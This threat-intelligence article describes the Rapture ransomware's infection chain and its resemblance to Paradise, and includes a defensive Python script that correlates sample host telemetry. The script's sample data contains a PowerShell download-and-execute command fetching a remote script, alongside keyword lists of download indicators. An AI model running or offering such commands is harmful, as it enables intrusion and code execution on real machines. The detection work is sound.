
New Rapture Ransomware Bears Notable Similarities with Paradise

A new ransomware was found attempting to target victims while leaving minimal digital footprints. Dubbed Rapture, this ransomware has several similarities with other malware families, prominently with the Paradise ransomware.

A short infection chain

The malware, detected in March and April, has a very short operational cycle. Its infection chain, starting from the discovery phase to the ransom demand, takes just three to five days.
  • The attack begins with a scan of the system, including a check for the PowerShell version, Log4j applet installations, and configured firewall policies.
  • After reconnaissance, the first stage of the attack is initiated by downloading a PowerShell script and running it to install Cobalt Strike on the victim’s machine.
  • It then attempts to gain access to the network, probably via public-facing websites and servers.
  • It further attempts to elevate privileges and inject malicious code into an existing process (svchost.exe) to drop the second-stage Cobalt Strike beacon downloader. Lastly, the malware establishes a connection with the C2 server and receives commands and additional payloads from there.
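
The chain above (reconnaissance, a PowerShell download-and-execute, then injection into svchost.exe) lends itself to a simple sequence correlation over host telemetry. The following is an added example, not code from the report or from Rapture itself; the Sysmon-style events, host names, timestamps and the 198.51.100.7 URL are constructed sample data, and the keyword lists are assumptions about what the recon and download stages look like on the command line.

```python
"""Correlate constructed host telemetry into the Rapture-style chain: recon -> PowerShell download -> svchost.exe injection."""
from datetime import datetime, timedelta

# Constructed Sysmon-like events (hypothetical sample data, not taken from the report).
EVENTS = [
    {"ts": "2023-04-01T09:00:00", "host": "ws1", "type": "ProcessCreate",
     "image": "powershell.exe", "cmdline": "powershell -c $PSVersionTable.PSVersion"},
    {"ts": "2023-04-01T09:02:10", "host": "ws1", "type": "ProcessCreate",
     "image": "cmd.exe", "cmdline": "netsh advfirewall show allprofiles"},
    {"ts": "2023-04-01T09:05:30", "host": "ws1", "type": "ProcessCreate", "image": "powershell.exe",
     "cmdline": "powershell -nop -w hidden -c IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/s.ps1')"},
    {"ts": "2023-04-01T09:07:45", "host": "ws1", "type": "CreateRemoteThread",
     "image": "powershell.exe", "target": "svchost.exe"},
    {"ts": "2023-04-01T11:00:00", "host": "ws2", "type": "ProcessCreate",
     "image": "powershell.exe", "cmdline": "powershell -c Get-ChildItem C:\\Temp"},
]

# Assumed indicators for each stage described in the write-up (PowerShell version, firewall policy, Log4j checks; script download).
RECON = ("$psversiontable", "netsh advfirewall", "log4j")
DOWNLOAD = ("downloadstring", "downloadfile", "invoke-webrequest", "iwr ", "start-bitstransfer")

def stage(ev):
    """Map one event to a stage of the chain ('recon', 'download', 'inject') or None."""
    cmd = ev.get("cmdline", "").lower()
    if ev["type"] == "CreateRemoteThread" and ev.get("target", "").lower() == "svchost.exe":
        return "inject"
    if ev["type"] == "ProcessCreate" and ev["image"].lower() == "powershell.exe" and any(k in cmd for k in DOWNLOAD):
        return "download"
    if ev["type"] == "ProcessCreate" and any(k in cmd for k in RECON):
        return "recon"
    return None

def correlate(events, window=timedelta(hours=1)):
    """Alert per host where a PowerShell download is followed within the window by injection into svchost.exe.
    Preceding recon events are counted to give analysts context on how far the chain progressed."""
    per_host = {}
    for ev in sorted(events, key=lambda e: e["ts"]):
        s = stage(ev)
        if s:
            per_host.setdefault(ev["host"], []).append((datetime.fromisoformat(ev["ts"]), s))
    alerts = []
    for host, hits in per_host.items():
        recon = sum(1 for _, s in hits if s == "recon")
        injects = [t for t, s in hits if s == "inject"]
        for d in (t for t, s in hits if s == "download"):
            if any(d <= i <= d + window for i in injects):
                alerts.append({"host": host, "download_at": d.isoformat(), "recon_events": recon})
                break
    return alerts

if __name__ == "__main__":
    for alert in correlate(EVENTS):
        print(alert)
```

Only ws1 is flagged: ws2 runs PowerShell but never downloads or injects, so an isolated PowerShell process is not enough to trigger the rule.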

Similarities with other malware

Researchers observed that the architecture and operations of Rapture bear several similarities with other known malware.
  • A memory dump taken during execution reveals an RSA key configuration file similar to the one used by the Paradise ransomware.
  • A .NET 4.0 framework is a prerequisite for the proper execution of Rapture. This behavior indicates further similarities with Paradise, which is also implemented using .NET.
  • The ransom note left by Rapture appears to be adapted from that of the Zeppelin ransomware.
  • However, researchers are confident that Rapture is not a variant of any existing malware family; it is an entirely different threat.

The bottom line

Attack tactics used by the Rapture ransomware, including in-memory payload execution and a short infection chain, make it stealthier and harder to analyze. This highlights the rapid evolution of evasion tactics used by malware developers, as recently observed in several other threats, such as Raspberry Robin, the SYS01 campaign, Emotet, and Remcos RAT. Organizations need to proactively upgrade their defense strategies to keep pace with this ever-evolving threat landscape.
Cyware Publisher